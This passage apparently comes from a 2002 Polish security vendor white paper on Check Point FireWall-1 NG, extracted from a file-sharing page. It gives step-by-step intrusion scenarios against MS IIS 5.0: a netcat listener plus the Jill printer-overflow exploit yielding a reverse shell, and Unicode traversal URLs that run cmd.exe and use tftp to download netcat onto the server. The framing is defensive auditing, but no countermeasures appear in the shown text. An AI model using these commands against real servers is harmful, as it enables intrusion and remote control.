praktyczne ataki hakerskie.pdf

(1155 KB) Pobierz

Temat: Praktyczne ataki hakerów na sieæ chronion¹ przez Check Point FireWall-1 Next Generation (NG)

P ROFESJONALNE S YSTEMY B EZPIECZEŃSTWA

Wykrywanie, analiza i przeciwdziałanie atakom hackerw

w Check Point FireWall-1 Next Generation (NG)

Opracował:

Mariusz Stawowski CCSA/CCSE (4.x, NG)

Podstawą bezpieczeństwa systemu informatycznego jest dobrze opracowany projekt

zabezpieczeń, wdrożony przez specjalistw z użyciem właściwie dobranych technologii

renomowanych producentw, zarządzany przez wykwalifikowaną kadrę informatyczną.

Samo zastosowanie nawet bardzo kosztownych produktw zabezpieczeń niczego w tym

zakresie nie gwarantuje. Projekt systemu zabezpieczeń powstaje w oparciu o oglną teorię

zabezpieczeń (m.in. podstawowe zasady polityki bezpieczeństwa), wyniki przeprowadzonej

analizy ryzyka i specyfikacji wymagań bezpieczeństwa, wymagania specyficzne dla

ochranianego systemu, a także wymagania funkcjonalno-techniczne uzgodnione z

właścicielem tego systemu (zwykle zleceniodawcą projektu).

Projektując zabezpieczenia systemu informatycznego należy rozumieć, jakie istnieją

rzeczywiste zagrożenia w tym systemie oraz w jaki sposb mogą one wystąpić. Projektant

zabezpieczeń powinien postawić się w roli hakera i przeanalizować potencjalne możliwości

wykonania ataku. Do tego celu wymagana jest znajomość technik włamań i innych rodzajw

atakw. Za najgroźniejsze zagrożenie uznaje się obecnie włamanie. Daje ono, bowiem

hakerowi bardzo szerokie możliwości działania (m.in. ujawnienie, modyfikacja lub

zniszczenie danych, zablokowanie usług, instalacja ukrytego wejścia do systemu,

przygotowanie środowiska do kontynuowania atakw na inne systemy).

Dokument przedstawia praktyczne możliwości wykorzystania systemu zabezpieczeń

Check Point FireWall-1 NG w zakresie wykrywania, analizy i przeciwdziałania atakom

hakerw. Występują trzy podstawowe techniki włamań do systemw komputerowych, ktre

należy uwzględnić w projekcie i wdrożeniu zabezpieczeń :

•

exploit Î wykorzystanie istniejącego błędu systemu operacyjnego lub

oprogramowania (np. serwera Web, serwera poczty) w celu przejęcia kontroli nad

systemem,

worm, trojan Î przesłanie do sieci wewnętrznej odpowiednio przygotowanego

programu (np. pocztą elektroniczną), ktry po uruchomieniu skopiuje i wyśle na

zewnątrz dane lub otworzy/umożliwi połączenie do sieci zewnętrznej,

maskarada Î dostęp do zasobw systemu informatycznego poprzez podszycie

się pod legalnego użytkownika (np. z użyciem odgadniętego hasła aplikacji, RAS

lub VPN).

Przed przystąpieniem do omawiania technologii Check Point FireWall-1 NG zostaną

przedstawione rzeczywiste scenariusze włamań do systemw komputerowych. Scenariusze

te zostały opracowane na podstawie prawdziwych włamań wykonanych przez CLICO w

ramach realizowanych audytw bezpieczeństwa. Zastosowane narzędzia są oglnie

dostępne w Internecie. Ważne jest, aby analizując scenariusze włamań zwrcić uwagę

i zrozumieć, jakie konsekwencje może mieć jeden błąd bezpieczeństwa serwera sieciowego.

Dobrze opracowana konfiguracja zabezpieczeń systemu informatycznego powinna

uwzględniać takie sytuacje i być na nie przygotowana.

CLICO Sp. z o.o., Al. 3-go Maja 7, 30-063 Krakw; Tel: 12 6325166; 12 2927522 ... 24 ; Fax: 12 6323698;

E-mail: support@Clico.PL, orders@Clico.PL.; http://www.clico.pl

197499744.060.png

Check Point FireWall-1 Next Generation (NG) Î wykrywanie, analiza i przeciwdziałanie atakom hakerw

Scenariusz 1. Włamanie do serwera WWW (MS IIS 5.0) z wykorzystaniem błędu

Remote Printer Overflow

2/ Uruchomienie Exploit (Jill) na serwer WWW (80/TCP )

IIS 5.0

(Windows 2000)

3/ Połączenie zwrotne na port 53/TCP

(konsola administratora Windows 2000)

FIREWALL

1/ Uruchomienie NetCat w trybie nasłuchu na porcie 53/TCP

Stacja audytora

(Linux)

1. Na stacji audytora otwieramy konsolę CMD i uruchamiamy aplikację NetCat (nc.exe) w

trybie nasłuchu na porcie 53/tcp (typowy port serwera dNS):

nc -s 10.1.2.77 -l -p 53

gdzie 10.1.2.77 to adres IP stacji audytora

2. Na drugiej konsoli CMD uruchamiamy program exploit (jill-win32.exe):

jill-win32 192.168.203.100 80 10.1.2.77 53

gdzie 192.168.203.100 to atakowany serwer WWW (MS IIS 5.0)

Poprawne wykonanie ataku sygnalizowane jest przez komunikat:

iis5 remote .printer overflow.

dark spyrit <dspyrit@beavuh.org> / beavuh labs.

Connected.

sent...

you may need to send a carriage on your listener if the shell doesn't appear.

have fun!

¨ 2002 CLICO S P . Z O . O . W SZELKIE PRAWA ZASTRZEŻONE

2

197499744.061.png

197499744.062.png

197499744.001.png

197499744.002.png

197499744.003.png

197499744.004.png

197499744.005.png

197499744.006.png

197499744.007.png

197499744.008.png

197499744.009.png

197499744.010.png

197499744.011.png

197499744.012.png

197499744.013.png

197499744.014.png

197499744.015.png

197499744.016.png

197499744.017.png

197499744.018.png

197499744.019.png

197499744.020.png

197499744.021.png

197499744.022.png

197499744.023.png

197499744.024.png

197499744.025.png

197499744.026.png

197499744.027.png

197499744.028.png

197499744.029.png

197499744.030.png

197499744.031.png

197499744.032.png

197499744.033.png

197499744.034.png

197499744.035.png

197499744.036.png

197499744.037.png

197499744.038.png

197499744.039.png

197499744.040.png

197499744.041.png

197499744.042.png

197499744.043.png

197499744.044.png

197499744.045.png

197499744.046.png

197499744.047.png

197499744.048.png

197499744.049.png

197499744.050.png

197499744.051.png

197499744.052.png

197499744.053.png

197499744.054.png

197499744.055.png

Check Point FireWall-1 Next Generation (NG) Î wykrywanie, analiza i przeciwdziałanie atakom hakerw

3. Po upływie kilku-dziecięciu sekund na stacji audytora otrzymujemy konsolę serwera

WWW.

¨ 2002 CLICO S P . Z O . O . W SZELKIE PRAWA ZASTRZEŻONE

3

197499744.056.png

Check Point FireWall-1 Next Generation (NG) Î wykrywanie, analiza i przeciwdziałanie atakom hakerw

Scenariusz 2. Włamanie do serwera WWW (MS IIS 5.0) z wykorzystaniem błędu

UNICODE BUG

1. Kontrola podatności serwera na atak:

http://192.168.203.100/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir

Inne możliwe testy:

http://192.168.203.100/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

http://192.168.203.100/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

http://192.168.203.100/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.ex

e?/c+dir

2. Penetracja systemu, np.

http://192.168.203.100/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:

http://192.168.203.100/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+..

http://192.168.203.100/scripts/.%252e/.%252e/winnt/system32/net.exe?view

http://192.168.203.100/scripts/.%252e/.%252e/winnt/system32/ipconfig.exe?/all

¨ 2002 CLICO S P . Z O . O . W SZELKIE PRAWA ZASTRZEŻONE

4

197499744.057.png

Check Point FireWall-1 Next Generation (NG) Î wykrywanie, analiza i przeciwdziałanie atakom hakerw

3. Przejecie kontroli nad systemem.

3.1. Kopiujemy cmd.exe do katalogu Scripts serwera WWW pod nazwą run.exe.

http://192.168.203.100/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+copy+..\..\wi

nnt\system32\cmd.exe+run.exe

3.2. Zapisujemy na serwerze plik unicode.bat o zawartości:

tftp -i Y.Y.Y.Y GET nc.exe get.exe

gdzie Y.Y.Y.Y to adres IP serwera TFTP, na ktrym umieszczono aplikację NetCat

Dokonujemy tego wpisując adres URL:

http://192.168.203.100/scripts/run.exe?/c+echo+tftp -i 10.1.2.77 GET nc.exe

get.exe>unicode.bat

¨ 2002 CLICO S P . Z O . O . W SZELKIE PRAWA ZASTRZEŻONE

5

197499744.058.png

197499744.059.png

Plik z chomika:

Inne pliki z tego folderu:

Przechwytywanie_informacji_w_sieciach_lan.pdf (3493 KB)
praktyczne ataki hakerskie.pdf (1155 KB)
Hakerzy - Technoanarchiści cyberprzestrzeni.pdf (3705 KB)
Hacking_GMail.pdf (5415 KB)
Hacking Firefox - more than 150 hacks mods and customization.pdf (13932 KB)

Inne foldery tego chomika:

Zgłoś jeśli naruszono regulamin